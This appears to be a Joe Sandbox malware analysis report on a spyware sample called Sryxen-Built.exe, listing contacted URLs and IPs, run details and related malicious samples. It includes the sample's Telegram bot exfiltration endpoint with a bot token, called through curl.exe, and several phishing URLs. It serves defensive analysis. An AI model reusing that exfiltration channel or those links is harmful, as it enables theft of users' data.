                        https://c.msn.com/c.gif?rnd=1741477429202&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8317c49e1884f1e947b8f0bc3e99881&activityId=a8317c49e1884f1e947b8f0bc3e99881&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0false
                          		high
                          https://deff.nelreports.net/api/report?cat=msnfalse
                            		high
                            https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531false
                              		high
                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1741477434549&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                		high
                                https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jsfalse
                                  		high
                                  https://ntp.msn.com/edge/ntp?locale=en-GB&title=New+tab&enableForceCache=truefalse
                                    		high
                                    https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1741477433540&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                      		high
                                      https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1741477434246&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                        		high
                                        https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=truefalse
                                          		high
                                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1741477433537&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                            		high
                                            https://bzib.nelreports.net/api/report?cat=bingbusinessfalse
                                              		high
                                              https://ntp.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.jsfalse
                                                		high
                                                https://assets.msn.com/statics/icons/favicon_newtabpage.pngfalse
                                                  		high
                                                  https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.jsfalse
                                                    		high
                                                    https://sb.scorecardresearch.com/b2?rn=1741477429202&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0815C547F66A6ADB3C0FD0EEF7EC6BB9&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                      		high

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabWeb Data.11.drfalse
                                                        		high
                                                        https://c.msn.com/2cc80dabc69f58b6_1.11.drfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=NTtqcw9.db.0.drfalse
                                                            		high
                                                            http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#Sryxen-Built.exefalse
                                                              		high
                                                              https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                		high
                                                                https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentcurl.exe, 00000013.00000002.1391486810.00000235E6890000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument7eateSryxen-Built.exe, 00000000.00000002.1489919638.0000018D463B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ntp.msn.com/0000003.log.11.drfalse
                                                                      		high
                                                                      https://ntp.msn.com/_defaultQuotaManager.11.drfalse
                                                                        		high
                                                                        https://www.last.fm/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                          		high
                                                                          https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.11.drfalse
                                                                            		high
                                                                            https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument#curl.exe, 00000013.00000002.1391486810.00000235E6898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.11.drfalse
                                                                                		high
                                                                                https://docs.google.com/manifest.json0.11.drfalse
                                                                                  		high
                                                                                  https://www.youtube.com3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                    		high
                                                                                    https://www.instagram.com3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                      		high
                                                                                      https://web.skype.com/?browsername=edge_canary_shoreline3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                        		high
                                                                                        https://drive.google.com/manifest.json0.11.drfalse
                                                                                          		high
                                                                                          https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentFcurl.exe, 00000013.00000002.1391486810.00000235E6898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=13c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                              		high
                                                                                              https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=23c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                		high
                                                                                                https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentJcurl.exe, 00000013.00000002.1391486810.00000235E6890000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.messenger.com3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                    		high
                                                                                                    https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                      		high
                                                                                                      https://outlook.office.com/mail/compose?isExtension=true3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                        		high
                                                                                                        https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.11.drfalse
                                                                                                          		high
                                                                                                          https://i.y.qq.com/n2/m/index.html3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                            		high
                                                                                                            https://www.deezer.com/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                              		high
                                                                                                              http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Sryxen-Built.exefalse
                                                                                                                		high
                                                                                                                https://www.office.com/Top Sites.11.drfalse
                                                                                                                  		high
                                                                                                                  https://web.telegram.org/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                    		high
                                                                                                                    https://cdnjs.cloudflare.com/ajax/libs/mathjax/service_worker_bin_prod.js.11.dr, offscreendocument_main.js.11.drfalse
                                                                                                                      		high
                                                                                                                      https://drive-daily-2.corp.google.com/manifest.json0.11.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://drive-daily-4.corp.google.com/manifest.json0.11.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://vibe.naver.com/today3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                        		high
                                                                                                                        https://srtb.msn.com/2cc80dabc69f58b6_1.11.drfalse
                                                                                                                          		high
                                                                                                                          https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.11.drfalse
                                                                                                                            		high
                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NTtqcw9.db.0.drfalse
                                                                                                                              		high
                                                                                                                              https://drive-daily-1.corp.google.com/manifest.json0.11.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://excel.new?from=EdgeM365Shoreline3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                		high
                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brNI5B49f.db.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://drive-daily-5.corp.google.com/manifest.json0.11.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.google.com/chromecontent_new.js.11.dr, content.js.11.drfalse
                                                                                                                                      		high
                                                                                                                                      https://www.tiktok.com/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                        		high
                                                                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSryxen-Built.exefalse
                                                                                                                                          		high
                                                                                                                                          https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.11.drfalse
                                                                                                                                            		high
                                                                                                                                            https://chromewebstore.google.com/manifest.json.11.drfalse
                                                                                                                                              		high
                                                                                                                                              https://drive-preprod.corp.google.com/manifest.json0.11.drfalse
                                                                                                                                                		high
                                                                                                                                                https://srtb.msn.cn/2cc80dabc69f58b6_1.11.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://msn.comXIDv10Cookies.12.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://www.onenote.com/stickynotes?isEdgeHub=true&auth=23c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.onenote.com/stickynotes?isEdgeHub=true&auth=13c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://chrome.google.com/webstore/manifest.json.11.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://y.music.163.com/m/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.11.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://bard.google.com/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.11.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://gemini.google.com/app?q=NTtqcw9.db.0.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://browser.events.data.msn.com/2cc80dabc69f58b6_1.11.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFNI5B49f.db.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://web.whatsapp.com3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://ocsp.sectigo.com0Sryxen-Built.exefalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://m.kugou.com/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.office.com3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://outlook.live.com/mail/0/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://ntp.msn.com/edge/ntp2cc80dabc69f58b6_1.11.dr, 000003.log.11.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://assets.msn.com/resolver/2cc80dabc69f58b6_1.11.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentzm#curl.exe, 00000013.00000002.1391486810.00000235E68AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://powerpoint.new?from=EdgeM365Shoreline3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Sryxen-Built.exe, 00000000.00000003.1259585485.0000018D463B3000.00000004.00000020.00020000.00000000.sdmp, Web Data.11.dr, NTtqcw9.db.0.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentC:curl.exe, 00000013.00000002.1391486810.00000235E6890000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://tidal.com/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://ntp.msn.com000003.log5.11.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://browser.events.data.msn.cn/2cc80dabc69f58b6_1.11.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_alldp.icoSryxen-Built.exe, 00000000.00000003.1259585485.0000018D463B3000.00000004.00000020.00020000.00000000.sdmp, NTtqcw9.db.0.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0Sryxen-Built.exefalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://gaana.com/3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://drive-staging.corp.google.com/manifest.json0.11.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://outlook.live.com/mail/compose?isExtension=true3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSryxen-Built.exe, 00000000.00000003.1259585485.0000018D463B3000.00000004.00000020.00020000.00000000.sdmp, Web Data.11.dr, NTtqcw9.db.0.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://ntp.msn.com/000003.log.11.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startSession_13385951012245184.11.drfalse
                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  23.44.201.37
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                  23.44.201.15
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                  52.182.143.214
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                  2.22.242.11
                                                                                                                                                                                                                  		a416.dscd.akamai.netEuropean Union
                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                  162.159.61.3
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  23.44.201.25
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                  204.79.197.219
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                  172.64.41.3
                                                                                                                                                                                                                  		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  52.231.230.148
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                  108.138.128.56
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                  23.57.90.73
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		35994AKAMAI-ASUSfalse
                                                                                                                                                                                                                  23.40.179.46
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                  23.44.201.8
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                  		unknownReserved
                                                                                                                                                                                                                  		unknownunknownfalse
                                                                                                                                                                                                                  23.209.72.21
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                  172.217.16.196
                                                                                                                                                                                                                  		www.google.comUnited States
                                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                                  204.79.197.203
                                                                                                                                                                                                                  		a-0003.a-msedge.netUnited States
                                                                                                                                                                                                                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                  142.250.185.97
                                                                                                                                                                                                                  		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                  		15169GOOGLEUSfalse

                                                                                                                                                                                                                  Private

                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                  192.168.2.4
                                                                                                                                                                                                                  127.0.0.1

                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                  Analysis ID:1632714
                                                                                                                                                                                                                  Start date and time:2025-03-09 00:42:16 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 7m 55s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:38
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:Sryxen-Built.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal84.troj.spyw.evad.winEXE@77/364@14/20
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 80%
                                                                                                                                                                                                                  • Number of executed functions: 171
                                                                                                                                                                                                                  • Number of non-executed functions: 98
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.181.238, 142.250.186.163, 66.102.1.84, 172.205.25.163, 204.79.197.239, 13.107.21.239, 216.58.206.78, 13.107.6.158, 2.23.227.208, 2.23.227.215, 4.209.164.61, 104.208.16.94, 40.69.146.102, 199.232.214.172, 192.178.129.94, 173.194.64.94, 23.199.214.10, 23.60.203.209, 52.123.243.195, 40.126.32.134, 20.109.210.53, 13.91.96.185, 13.107.246.51, 23.57.90.70, 142.250.80.10, 104.117.182.32, 150.171.27.10
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, clientservices.googleapis.com, clients2.google.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, prod-agic-ne-9.northeurope.cloudapp.azure.com, www.gstatic.com, config.edge.skype.com, onedsblobprdcus16.centralus.cloudapp.azure.com, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com, prod-atm-wds-edge.trafficmanager.net, b-0005.b-msedge.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, c.bing.com, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, business.bing.com, umwatson.events.data.microsoft.com, onedsblobvmssprdcus04.centralu
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  18:43:27API Interceptor1x Sleep call for process: Sryxen-Built.exe modified
                                                                                                                                                                                                                  18:43:38API Interceptor32x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                  18:43:45API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                  23:43:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                                                  23:43:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5

                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  162.159.61.3f38186770bffa4a12a7170942b9c0d71ac736142924da24a.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                    thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        ADFoyxP.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                          desaremix.exeGet hashmaliciousKillMBRBrowse
                                                                                                                                                                                                                            https://www.flipsnack.com/859EECFF8D6/distribution-agreement/full-view.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                https://zsharepointonlinems.mysteriousroutes.it.com/kOPeS/#fuck@you.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  ATTACH - kotak.com.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    Ocean-City.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      23.44.201.37vXn4pan2US.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            23.44.201.15F2024065877 (1).htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              HFONAfX2aC.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                Purchase_Agreement_1020036.pdf.lnk.bin.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                      https://www.bing.com/search?q=%e8%8f%af%e7%a2%a9+TUF+GAMING+B760M-PLUS+WIFI%e4%b8%bb%e6%a9%9f%e6%9d%bf&cvid=8ed3431d674542bbaed6934068e7242d&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyBwgJEEUY_FXSAQgxMDUwajBqNKgCALACAA&PC=U531&FPIG=7973DC1DA237417B95A39D883F2961E8&first=121&FORM=PERE2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        52.182.143.2142025_Simplified_Tips_to_Stay_on_Track.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          Message_3410710_2.emlGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                            1737072166-104528-13339-8488-1.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              https://9cjl.enestiveryal.ru/lodfnqw/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                vMRlWtVCEN.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                  8CwKupnahl.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        http://learnthelanguage.nl/?wptouch_switch=desktop&redirect=http://basinindustriesinc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
